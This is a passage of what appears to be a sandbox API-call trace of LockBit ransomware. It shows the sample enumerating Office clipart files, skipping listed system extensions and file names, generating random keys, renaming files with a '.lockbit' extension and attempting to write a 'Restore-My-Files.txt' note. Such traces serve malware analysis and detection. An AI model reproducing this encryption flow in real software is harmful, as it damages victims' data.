returned 0x14c [0180.470] malloc (_Size=0x40068) returned 0x1ff1e60 [0180.470] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=8310) returned 1 [0180.470] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.470] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.470] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0180.470] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.471] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.471] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0180.471] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0180.476] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01304G.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01304G.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0180.476] malloc (_Size=0xa6) returned 0x1fa2ed8 [0180.476] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0180.478] free (_Block=0x1fa2ed8) [0180.478] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01304G.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0180.478] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0180.478] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0180.478] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4c9d300, ftCreationTime.dwHighDateTime=0x1bd4e62, ftLastAccessTime.dwLowDateTime=0x5e574fb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd4c9d300, ftLastWriteTime.dwHighDateTime=0x1bd4e62, nFileSizeHigh=0x0, nFileSizeLow=0x172, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01330_.GIF", cAlternateFileName="")) returned 1 [0180.478] lstrcmpiW (lpString1=".", lpString2="WB01330_.GIF") returned -1 [0180.478] lstrcmpiW (lpString1="..", lpString2="WB01330_.GIF") returned -1 [0180.479] PathFindExtensionW (pszPath="WB01330_.GIF") returned=".GIF" [0180.479] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0180.479] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0180.479] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0180.479] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0180.479] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0180.479] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0180.479] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0180.479] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0180.479] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0180.479] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0180.479] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0180.479] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0180.479] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0180.479] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0180.479] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0180.479] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0180.479] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0180.479] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0180.479] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0180.479] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0180.479] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0180.479] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0180.479] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0180.480] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0180.480] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.480] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0180.480] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0180.480] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0180.480] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0180.480] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0180.480] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0180.480] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0180.480] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0180.480] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0180.480] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0180.480] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0180.480] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0180.480] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0180.480] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0180.480] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0180.480] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0180.480] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0180.480] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.480] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0180.480] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0180.480] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0180.480] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0180.480] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01330_.GIF") returned -1 [0180.481] lstrcmpiW (lpString1="ntldr", lpString2="WB01330_.GIF") returned -1 [0180.481] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01330_.GIF") returned -1 [0180.481] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01330_.GIF") returned -1 [0180.481] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01330_.GIF") returned -1 [0180.481] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01330_.GIF") returned -1 [0180.481] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01330_.GIF") returned -1 [0180.481] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0180.481] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01330_.GIF") returned=".GIF" [0180.481] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0180.481] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0180.481] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0180.481] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0180.481] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0180.481] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0180.481] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0180.481] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0180.481] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0180.481] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0180.481] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0180.481] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0180.481] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0180.481] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0180.481] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0180.481] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0180.482] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0180.482] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0180.482] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0180.482] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0180.482] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0180.482] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0180.482] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0180.482] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0180.482] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0180.482] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0180.482] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0180.482] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0180.482] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01330_.GIF.lockbit") returned 72 [0180.482] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01330_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01330_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0180.838] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0180.838] malloc (_Size=0x40068) returned 0x3df0008 [0180.839] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=370) returned 1 [0180.839] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.839] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.839] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0180.839] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.840] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.840] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0180.840] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0180.846] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01330_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01330_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0180.846] malloc (_Size=0xa6) returned 0x1fa2ed8 [0180.846] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0180.846] free (_Block=0x1fa2ed8) [0180.846] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01330_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0180.846] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0180.846] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0180.846] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x976a4300, ftCreationTime.dwHighDateTime=0x1bd4e6c, ftLastAccessTime.dwLowDateTime=0x70875130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x976a4300, ftLastWriteTime.dwHighDateTime=0x1bd4e6c, nFileSizeHigh=0x0, nFileSizeLow=0x899, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01734_.GIF", cAlternateFileName="")) returned 1 [0180.846] lstrcmpiW (lpString1=".", lpString2="WB01734_.GIF") returned -1 [0180.846] lstrcmpiW (lpString1="..", lpString2="WB01734_.GIF") returned -1 [0180.846] PathFindExtensionW (pszPath="WB01734_.GIF") returned=".GIF" [0180.846] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0180.846] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0180.847] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0180.847] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0180.847] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0180.847] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0180.847] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0180.847] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0180.847] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0180.847] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0180.847] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0180.847] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0180.847] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0180.847] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0180.847] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0180.847] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0180.847] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0180.847] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0180.847] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0180.847] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0180.847] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0180.847] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0180.847] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0180.848] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0180.848] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.848] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0180.848] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0180.848] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0180.848] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0180.848] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0180.848] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0180.848] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0180.848] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0180.848] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0180.848] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0180.848] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0180.848] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0180.848] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0180.848] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0180.848] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0180.848] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0180.848] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0180.848] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.849] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0180.849] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0180.849] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0180.849] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0180.849] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01734_.GIF") returned -1 [0180.849] lstrcmpiW (lpString1="ntldr", lpString2="WB01734_.GIF") returned -1 [0180.849] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01734_.GIF") returned -1 [0180.849] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01734_.GIF") returned -1 [0180.849] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01734_.GIF") returned -1 [0180.849] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01734_.GIF") returned -1 [0180.849] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01734_.GIF") returned -1 [0180.849] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0180.849] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01734_.GIF") returned=".GIF" [0180.849] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0180.849] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0180.849] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0180.849] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0180.849] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0180.849] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0180.849] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0180.849] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0180.849] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0180.849] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0180.849] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0180.849] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0180.850] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0180.850] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0180.850] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0180.850] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0180.850] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0180.850] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0180.850] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0180.850] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0180.850] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0180.850] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0180.850] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0180.850] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0180.850] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0180.850] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0180.850] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0180.850] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0180.850] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01734_.GIF.lockbit") returned 72 [0180.850] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01734_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01734_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0180.853] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0180.853] malloc (_Size=0x40068) returned 0x3df0008 [0180.853] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2201) returned 1 [0180.853] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.853] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.854] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0180.854] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.854] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.854] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0180.854] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0180.856] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01734_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01734_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0180.856] malloc (_Size=0xa6) returned 0x1fa2ed8 [0180.856] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0180.858] free (_Block=0x1fa2ed8) [0180.858] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01734_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0180.858] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0180.858] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0180.858] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b18d700, ftCreationTime.dwHighDateTime=0x1bd4e69, ftLastAccessTime.dwLowDateTime=0x5e574fb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7b18d700, ftLastWriteTime.dwHighDateTime=0x1bd4e69, nFileSizeHigh=0x0, nFileSizeLow=0x2c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01740_.GIF", cAlternateFileName="")) returned 1 [0180.858] lstrcmpiW (lpString1=".", lpString2="WB01740_.GIF") returned -1 [0180.858] lstrcmpiW (lpString1="..", lpString2="WB01740_.GIF") returned -1 [0180.858] PathFindExtensionW (pszPath="WB01740_.GIF") returned=".GIF" [0180.859] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0180.859] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0180.859] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0180.859] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0180.859] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0180.859] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0180.859] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0180.859] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0180.859] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0180.859] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0180.859] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0180.859] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0180.859] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0180.859] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0180.859] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0180.859] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0180.859] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0180.859] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0180.859] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0180.859] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0180.859] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0180.859] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0180.859] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0180.860] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0180.860] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.860] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0180.860] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0180.860] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0180.860] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0180.860] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0180.860] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0180.860] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0180.860] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0180.860] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0180.860] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0180.860] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0180.860] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0180.860] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0180.860] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0180.860] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0180.860] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0180.860] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0180.860] 